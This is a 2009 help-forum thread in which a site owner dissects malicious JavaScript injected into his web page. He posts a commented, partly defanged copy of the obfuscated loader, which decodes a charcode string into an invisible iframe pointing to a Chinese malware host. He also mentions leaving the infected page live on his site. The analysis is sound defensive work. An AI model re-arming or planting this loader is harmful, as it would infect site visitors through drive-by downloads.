| Forum Home | ||||
| Press F1 | ||||
| Thread ID: 100444 | 2009-06-08 02:16:00 | Virus on web-page?? | notechyet (4479) | Press F1 |
| Post ID | Timestamp | Content | User | ||
| 780535 | 2009-06-08 10:15:00 | Thanks a lot guys for all your replies(and testing) and an apology for the infected link. I just did not know how else to ask for advice on this problem. | notechyet (4479) | ||
| 780536 | 2009-06-08 12:22:00 | Oops.... good point, I didn't think of the implications there - just figured people would be interested in the dissection, rather than actually trying to click through to the nasties. Sorry! Interesting though, as my Avast stopped me getting to the site in question and mentioned an Iframe issue. |
Sweep (90) | ||
| 780537 | 2009-06-09 14:38:00 | Hi, Erayd, May I ask how you decoded that JS? I am having a very similar problem with my web page. One person has reported JS/Kryptik.F, and another reported HTML/Framer.BS (he uses AVG). I am told others have reported "viruses" as well, but no further details (thanks!) I have a piece of code similar to the offending code you showed on my page, which is at http:// soccerpointeclaire [dot] com. I am not pasting the actual code, and obfuscated the page address, for obvious reasons. It appears that this is the only page giving problems... The main difference about this page is that it has a Flash logo at the top. I myself have looked at this page with IE, Firefox and Chrome, with no error. I use Trend OfficeScan (corporate version of PC-Cillin). That page, btw, has not changed in months. I know, of course, that it could have somehow been modified by a hacker, but I compared it to an older backup copy, and they are identical (I renamed the old one and uploaded the backup, just in case). I have one possible theory that a new AV signature, shared by various AV developers (if they do that) may be producing false positives... Another is that somehow the Flash code downloaded from the Macromedia site may have become infected. I guess that's all I have for now, but I welcome any and all questions, and will help in any way I can. Salutations, -Paul |
MontrealPaul (14981) | ||
| 780538 | 2009-06-09 15:13:00 | Quick update: It occured to me to try simply removing that wonky code, which I did, using a plaintext editor, after making a backup of the original page. Turns out this made no difference (to me) in how the page displays, which suggests that that code was unnecessary, and probably malicious. I use Dreamweaver, btw, which inserts all sorts of wonky code, so sometimes it's hard to tell what belongs and what does not. For those who want to check it out, I have left the original "infected" page there, under the name of index_Virus.htm (note the capital V) Salutations, -Paul |
MontrealPaul (14981) | ||
| 780539 | 2009-06-09 21:15:00 | Latest: Yep, it was a trojan/xxs/worm! I'm not 100% certain, but I suspect it might be gumblar . Here are two links that speak of it: . switched . com/2009/06/02/though-the-conficker-virus-was-bad-meet-gumblar/" target="_blank">www . switched . com . avast . com/2009/06/03/gumblarcn-summary/" target="_blank">blog . avast . com Yes, I have changed the credentials for my website . Anyone who looks at that "virus" page of mine (see previous posts) will see, after the first <header> tag, a long java script . What it does, in the end, is open an iframe, with opacity=0 (invisible), to a site in China . I have broken it down, and commented it, for anywone interested . I have also modified the code so that any n00b dumb enough to run it will have to try very hard to make it dangerous . . . (how'd I do, Jen? :)) It will probably be hard to read, in the constraints of this web page, so you may want to copy/paste it into your favourite code editor, where it will be nicely coloured for clarity . <script type="text/javascript"> // The following assigns the very long string to VariableOne . (Note the repeating string "EOje") var VariableOne = "EOje91EOje105EOje102EOje114EOje97EOje109EOje101EOj e32EOje119EOje105EOje100EOje116EOje104EOje61EOje34 EOje52EOje56EOje48EOje34EOje32EOje104EOje101EOje10 5EOje103EOje104EOje116EOje61EOje34EOje54EOje48EOje 34EOje32EOje115EOje114EOje99EOje61EOje34EOje104EOj e116EOje116EOje112EOje58EOje47EOje47EOje116EOje114 EOje97EOje102EOje102EOje105EOje99EOje45EOje114EOje 101EOje115EOje111EOje117EOje114EOje99EOje101EOje11 5EOje46EOje99EOje110EOje47EOje111EOje114EOje100EOj e101EOje114EOje47EOje105EOje110EOje46EOje99EOje103 EOje105EOje63EOje50EOje34EOje32EOje115EOje116EOje1 21EOje108EOje101EOje61EOje34EOje98EOje111EOje114EO je100EOje101EOje114EOje58EOje48EOje112EOje120EOje5 9EOje32EOje112EOje111EOje115EOje105EOje116EOje105E Oje111EOje110EOje58EOje114EOje101EOje108EOje97EOje 116EOje105EOje118EOje101EOje59EOje32EOje116EOje111 EOje112EOje58EOje48EOje112EOje120EOje59EOje32EOje1 08EOje101EOje102EOje116EOje58EOje45EOje53EOje48EOj e48EOje112EOje120EOje59EOje32EOje111EOje112EOje97E Oje99EOje105EOje116EOje121EOje58EOje48EOje59EOje32 EOje102EOje105EOje108EOje116EOje101EOje114EOje58EO je112EOje114EOje111EOje103EOje105EOje100EOje58EOje 68EOje88EOje73EOje109EOje97EOje103EOje101EOje84EOj e114EOje97EOje110EOje115EOje102EOje111EOje114EOje1 09EOje46EOje77EOje105EOje99EOje114EOje111EOje115EO je111EOje102EOje116EOje46EOje65EOje108EOje112EOje1 04EOje97EOje40EOje111EOje112EOje97EOje99EOje105EOj e116EOje121EOje61EOje48EOje41EOje59EOje32EOje45EOj e109EOje111EOje122EOje45EOje111EOje112EOje97EOje99 EOje105EOje116EOje121EOje58EOje48EOje34EOje93EOje9 1EOje47EOje105EOje102EOje114EOje97EOje109EOje101EO je93"; //To improve safety, I have replaced code 60 ("<") with 91 ("["), and 62 (">") with 93 ("]") . // This splits VariableOne into a comma-separated string, substituting "EOje" for a comma . // The result is stored in VariableTwo . var VariableTwo = VariableOne . split("EOje"); //I'm inserting a printout here of the code so far: document . write(VariableTwo) //See . ascii . cl/htmlcodes . htm" target="_blank">www . ascii . cl for a list of codes . // Initialize and empty VariableThree var VariableThree = ""; // The following For loop reads as follows: //starting at 1, for (var VariableFour=1; //for each character in VariableTwo, VariableFour<VariableTwo . length; //incrementing by one each time VariableFour++) //do this: //VariableThree is now what VariableThree was, plus the character in VariableTwo, at the position VariableFour is at . {VariableThree+=String . fromCharCode(VariableTwo[VariableFour]); } //Not sure why this is necessary . . . var VariableFive = ""+VariableThree+""; //Now, deliver the load; DANGER: This is where it all happens!! document . write(""+VariableFive+"") //Again, not sure why it is necessary to border with more empty strings . . . //Done . document . write("-----------------------<BR>"); var var1="Done" document . write(""+var1+"") </script> N . B . : In the original code, "VariableOne", "VariableTwo", etc . are also garbagey-looking names like hPLAmyvsdfELzjhpwQYf . What this finally produces is something almost (because I "fixed" it) like the following: Why did I go through all of the above, you may ask? Well, the main reason is that I was learning as I went, so I commented to keep track of where I am so far . Plus, it makes it easier to share afterwards! :nerd: Cheers, -Paul |
MontrealPaul (14981) | ||
| 1 2 | |||||